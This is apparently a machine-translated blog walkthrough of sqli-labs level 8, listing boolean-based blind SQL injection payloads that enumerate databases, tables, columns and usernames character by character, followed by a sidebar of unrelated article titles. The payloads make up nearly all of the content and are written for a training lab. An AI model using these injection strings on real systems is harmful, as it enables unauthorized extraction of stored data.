当前位置:网站首页>sqli-labs(less-8)
sqli-labs(less-8)
2022-07-28 12:34:00 【Unknown white hat】
Catalog
less-8( Bull's blind note ) manual
2. Judge the number of databases
3. Determine the length of the first database character
4. according to ascii Code to determine the specific characters of each library name
5. Judge security Number of tables in the Library
6. Judge security The length of the first table name in the Library
7. Judge security The first character of the first table in the Library ascii value
8. Judge security.users Number of fields in the table
9. Judge security.users The length of the first field of the table
10. Judge security.users The first character of the first field of the table ascii value
11. Judge security.users How many rows of data does the table have
12. Judge user The first row in the table username The data length of the field
13. Judge user The first row in the table username The first character of the field ascii value
less-8( Bull's blind note ) manual
1. Judge the closing mode
2. Judge the number of databases
?id=1' and (select count (schema_name) from information_schema.schemata)= Number of databases ( from 1 Start guessing ) -- -
3. Determine the length of the first database character
?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=18 -- -
4. according to ascii Code to determine the specific characters of each library name
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105 -- - # It can be used > and < Judge the approximate position
5. Judge security Number of tables in the Library
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -
6. Judge security The length of the first table name in the Library
?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 -- -
7. Judge security The first character of the first table in the Library ascii value
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- -
8. Judge security.users Number of fields in the table
?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3-- -
9. Judge security.users The length of the first field of the table
?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)=2 -- -
10. Judge security.users The first character of the first field of the table ascii value
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 -- -
11. Judge security.users How many rows of data does the table have
?id=1' and (select count(username) from security.users)=13 -- -
12. Judge user The first row in the table username The data length of the field
?id=1' and (select length(username) from security.users limit 0,1)=4 -- -
13. Judge user The first row in the table username The first character of the field ascii value
?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68-- -
边栏推荐
- If you don't roll the golden nine and silver ten, it's too late
- Top level "redis notes", cache avalanche + breakdown + penetration + cluster + distributed lock, Nb
- Open source huizhichuang future | 2022 open atom global open source summit openatom openeuler sub forum was successfully held
- Several ways to bind controls --butterknife/viewbinding/databinding
- HMS core audio editing service supports 7 kinds of audio effects to help one-stop audio processing
- Redis实现分布式锁
- IRBuilder
- Force buckle 7_ 1672. Total assets of the richest customers
- Developing NES games with C language (cc65) 10. Game cycle
- Developing NES game (cc65) 03 and VRAM buffer with C language
猜你喜欢
Newly released, the domestic ide developed by Alibaba is completely open source
Huawei releases harmonyos 3 and all scene new products, and the smart experience goes further
Top level "redis notes", cache avalanche + breakdown + penetration + cluster + distributed lock, Nb
Open source huizhichuang future | 2022 open atom global open source summit openatom openeuler sub forum was successfully held
Great! Jd.com developed the highly available website construction technology PDF recommended by the first brother. Prepare the water and chew it slowly
Exploration on cache design optimization of community like business
30 years of open source community | 2022 open atom global open source summit 30 years of special activities of open source community were successfully held
Image filter from the perspective of convolution
Not optimistic about Apple making AR, Luo Yonghao: I'll do it myself
聚变云原生,赋能新里程 | 2022 开放原子全球开源峰会云原生分论坛圆满召开
随机推荐
让arduino支持nuvotom新唐
How to build knowledge management system in enterprises and institutions
配置Jupyter远程服务器
产学研用 共建开源人才生态 | 2022 开放原子全球开源峰会教育分论坛圆满召开
Interpretation of the paper: attention mechanism in medical images
OpenAtom OpenHarmony分论坛圆满举办,生态与产业发展迈向新征程
PHP日期时间运用:添加或减去特定日期的天数
Is it difficult for cloud native machine learning to land? Lingqueyun helps enterprises quickly apply mlops
易观分析:以用户为中心提升手机银行用户体验,助力用户价值增长
要想组建敏捷团队,这些方法不可少
Open source huizhichuang future | 2022 open atom global open source summit openatom openeuler sub forum was successfully held
Exploration on cache design optimization of community like business
Open source database innovation in the era of digital economy | the 2022 open atom global open source summit database sub forum was successfully held
用C语言开发NES游戏(CC65)06、精灵
Uninstall Navicat: genuine MySQL official client, really fragrant!
Full analysis of seven classical regression analysis methods
PHP gets all the dates of this week or the last seven days
php 日期计算操作处理,当前日期加一天和指定日期减一天
Multi Chain and multi currency wallet system development cross chain technology
Industry, University, research and application jointly build an open source talent ecosystem | the 2022 open atom global open source summit education sub forum was successfully held